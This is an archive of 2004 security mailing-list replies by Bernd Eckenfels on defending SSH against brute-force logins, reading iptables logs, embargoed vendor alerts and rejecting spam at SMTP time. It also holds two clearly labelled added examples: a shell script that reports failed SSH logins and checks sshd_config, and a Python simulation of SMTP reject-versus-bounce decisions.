2004-09-19 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Other than blacklisting the IPs (which is a race I am going to
 lose), what are people doing? Are there any distinctive marks in the
 SSH login attempt that one could filter on?

You can either move your ssh to another port, that will greatly reduce the
distributed brute force attacks, or you can put a filter with port knocking
in front of it. Another option is to turn off password authentication
completely.

And yes you should be worried about those attacks if you have weak passwords.

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/
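Two of the three measures above can be checked and driven from a script. As an added example that is not Bernd's code: a report of the hosts behind the failed logins in auth.log (the sample log is constructed; the line format is that of OpenSSH's sshd on Debian of that time), the matching iptables rules printed rather than applied, and a check whether sshd_config still allows password authentication, which is what the brute force needs in the first place. The Match-block subtleties of sshd_config are ignored, an assumption noted in the code.

```shell
#!/bin/sh
# Added example (not from the thread): pick the brute-forcing hosts out of
# auth.log, turn them into firewall rules, and check the setting that makes
# the attack pointless (PasswordAuthentication no).

# brute_force_report LOG THRESHOLD -> "<count> <ip>" per offending IP, most active first.
# Counts "Failed password for <user|illegal user X> from <ip>" lines only.
brute_force_report() {
    awk -v t="$2" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            n[ip]++
        }
        END { for (ip in n) if (n[ip] >= t) print n[ip], ip }
    ' "$1" | sort -rn
}

# drop_rules LOG THRESHOLD -> iptables commands (printed, not executed) per offender
drop_rules() {
    brute_force_report "$1" "$2" | while read -r count ip; do
        printf 'iptables -I INPUT -s %s -p tcp --dport 22 -j DROP   # %s failures\n' "$ip" "$count"
    done
}

# password_auth_enabled SSHD_CONFIG -> yes/no. sshd uses the first value it finds,
# and the default when the line is absent is yes. Match blocks are not considered.
password_auth_enabled() {
    v=$(sed -e 's/#.*//' "$1" | awk '
        tolower($1) == "passwordauthentication" && v == "" { v = tolower($2) }
        END { print v }')
    case "$v" in no) echo no ;; *) echo yes ;; esac
}

# Constructed sample auth.log for the usage and the test
sample_log() {
    cat <<'EOF'
Sep 19 03:12:01 colo sshd[2211]: Failed password for root from 10.0.0.5 port 40212 ssh2
Sep 19 03:12:04 colo sshd[2213]: Failed password for root from 10.0.0.5 port 40218 ssh2
Sep 19 03:12:07 colo sshd[2215]: Failed password for illegal user test from 10.0.0.5 port 40224 ssh2
Sep 19 03:12:09 colo sshd[2217]: Failed password for illegal user admin from 10.0.0.5 port 40230 ssh2
Sep 19 03:13:40 colo sshd[2240]: Failed password for root from 192.0.2.77 port 1022 ssh2
Sep 19 03:15:12 colo sshd[2260]: Accepted publickey for ecki from 198.51.100.9 port 51102 ssh2
EOF
}

# Usage: sh ssh_bruteforce.sh report /var/log/auth.log 5
#        sh ssh_bruteforce.sh rules  /var/log/auth.log 5
#        sh ssh_bruteforce.sh check  /etc/ssh/sshd_config
case "${1:-}" in
    report) brute_force_report "$2" "$3" ;;
    rules)  drop_rules "$2" "$3" ;;
    check)  password_auth_enabled "$2" ;;
esac
```

Blocking by address is the race Bernd's correspondent already expects to lose; the report is mostly useful to see whether the attempts are distributed. The `check` verdict is the one that matters: with password authentication off, every line in that log is noise.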





Re: JavaScript and Cookies enabled in Browser

2004-08-21 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 This strikes me as a dubious claim. If, as they claim, they use the
 browser SSL layer then they could be *as* secure as an IPSec or SSL VPN
 system at best, and could be completely insecure.

Webex is using a Java applet or ActiveX control for displaying the remote
desktop.

AFAIK there is a solution on freshmeat to multiplex X clients to multiple X
servers by a virtual server: xmx

I think with WebEx you can only publish a Windows Desktop. In that case you
can run UltraVNC on it, this is able to attach multiple clients.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: newbie iptables question

2004-08-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
   Aug 12 04:36:53 towern kernel: |iptables -- IN=ppp0 OUT= MAC= 
   SRC=201.129.122.85 DST=12.65.24.43 LEN=48 TOS=0x00 PREC=0x00 TTL=115 
   ID=40023 DF PROTO=TCP SPT=4346 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0 
...
 It all depends on whether you have services running on your machine
 that listen on DPT (445 in this case).  If something is there to pick
 up the phone so to speak, anything can happen.  That service could
 answer on another port altogether.

Well, you need to check if DST= is a local address, anyway.

Gruss
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: newbie iptables question

2004-08-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Well, you need to check if DST= is a local address, anyway.
 
 Are you suggesting that I might see stuff in my logs that was destined
 for a foreign IP?  If so, that would make me an open mail relay, no?

If your system is a gateway, this is quite common. No thats not related to
mail relays.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: Proposal/suggestion for security team w.r.t. published vulerabilities

2004-07-06 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 mdz told me this isn't done for practical reasons: the BTS isn't very
 suitable for tracking which versions are affected, and a sid upload can
 close such a bug while it's still in woody. While I think it'd still be
 possible without too much hassle, if they don't want to do so, I'm not
 going to interfere in that.

Well, I guess anybody is free to open bugs against packages if they hear
about vulnerabilities. I guess this even might help in some cases. But I
don't think the security team can publish received vendor alerts before the
going-public date. Effectively this is hiding, but on the other hand it is also
respecting the wishes and requests of others. And not honoring them will
quickly lead to Debian being cut off from those alerts. So that's why
unpublished alerts are not posted.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/





Re: rbl's status?

2004-06-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 This sort of thing is why I would rather use any RBL within
 SpamAssassin, rather than at SMTP delivery time. Even if one of these
 services goes completely belly up and blacklists the world, I don't
 automatically lose mail from it.

Please don't do this. You MUST reject mails (by spam scanners, malware
scanners or blacklists) on the SMTP level, otherwise you become a pretty big
annoyance to the internet (if you bounce) or will silently lose mails (if
you drop them).


Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/



Re: Unusual spam recently - hummm - postprocess

2004-06-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 It's possible you're taking that fact into account:  I'd be curious to
 hear how you (or others) are ensuring that such bounces go somewhere
 appropriate.

Well, fisrt of all, I accept mail for outgoing relay only from verified
sources, this includes SMTP AUTH or based on ip address. This is of course
not 100% secure. And second, you should try to not generate bounces. This
includes spam rejects, unknown mailboxes and virus alerts. All those must be
rejcted on the smtp level. This is all one can do in his own local
responsibility.

For backup MX or centralized mail gateways it is therefore a matter of good
service to do all those rejections at the SMTP level, which might involve
replicated addressbooks or even pipelining.

A lot of organisations forget to include their backup MX into their mail
concept and are the main reasons for bounce floods caused by malware or
faked-sender spam. (Of course with open relays it does not help if you do
not bounce, but those are not the biggest source of spam.) Direct delivery
from dialups or open proxies is much more common, at least for the large
mail providers.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/
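The point made in this post and in the earlier rbl reply (reject at SMTP time, never accept-then-bounce, and give the backup MX the same recipient table as the primary) can be shown by simulating the RCPT TO decision. This is an added example, not code from the list post; the recipient table, networks and envelopes are constructed sample data.

```python
import ipaddress
from dataclasses import dataclass

# Constructed data: the recipient table the primary MX replicates to its
# backup MX so both can answer RCPT TO authoritatively (hypothetical names).
VALID_RECIPIENTS = {"alice@example.org", "postmaster@example.org"}
LOCAL_DOMAINS = {"example.org"}
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]  # relay "based on IP address"

@dataclass
class Envelope:
    client_ip: str
    authenticated: bool  # SMTP AUTH succeeded
    mail_from: str       # possibly forged, so never a safe bounce target
    rcpt_to: str

def is_local(addr: str) -> bool:
    return addr.rsplit("@", 1)[-1].lower() in LOCAL_DOMAINS

def rcpt_decision(env: Envelope) -> tuple:
    """Decide at RCPT TO, before any message data is accepted."""
    if is_local(env.rcpt_to):
        if env.rcpt_to.lower() in VALID_RECIPIENTS:
            return 250, "2.1.5 Ok"
        return 550, "5.1.1 User unknown"  # sender's MTA handles it; no bounce from us
    ip = ipaddress.ip_address(env.client_ip)
    if env.authenticated or any(ip in net for net in TRUSTED_NETS):
        return 250, "2.1.5 Ok"             # verified source may relay outbound
    return 554, "5.7.1 Relay access denied"

def simulate(envelopes, reject_at_smtp: bool) -> dict:
    """With reject_at_smtp=False the MTA accepts all mail for local domains
    and bounces unknown users afterwards, i.e. mails the forged MAIL FROM."""
    stats = {"accepted": 0, "rejected": 0, "bounces": 0}
    for env in envelopes:
        code, _ = rcpt_decision(env)
        if reject_at_smtp or not is_local(env.rcpt_to):
            stats["accepted" if code == 250 else "rejected"] += 1
        else:
            stats["accepted"] += 1
            if code != 250:
                stats["bounces"] += 1  # backscatter to an innocent third party
    return stats

# Constructed inbound envelopes: forged senders aimed at unknown local users,
# one relay attempt from an untrusted host, one authenticated outbound mail.
SAMPLE = [
    Envelope("198.51.100.7", False, "forged@victim.example", "alice@example.org"),
    Envelope("198.51.100.7", False, "forged@victim.example", "nobody@example.org"),
    Envelope("203.0.113.9", False, "another@victim.example", "gone@example.org"),
    Envelope("203.0.113.9", False, "spam@victim.example", "someone@elsewhere.example"),
    Envelope("192.0.2.10", True, "alice@example.org", "friend@elsewhere.example"),
]
```

Running `simulate(SAMPLE, True)` yields no bounces at all, while `simulate(SAMPLE, False)` produces one bounce per forged-sender message to an unknown mailbox.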





Re: Unusual spam recently - hummm - postprocess

2004-06-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Why is SPF important?  Because it eliminates joe-jobs.  That is, it
 allows mail admins to absolutely validate the envelope return path --
 significant because spammers have recently gotten around to forging
 sender envelope information, allowing forged mail that appears to be
 credibly from your domain or mine, etc. -- and as such began defeating
 even quite good security regimes.

Solutions like Yahoo's DomainKeys header signature are much better suited for
that, I think.

http://antispam.yahoo.com/domainkeys

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/

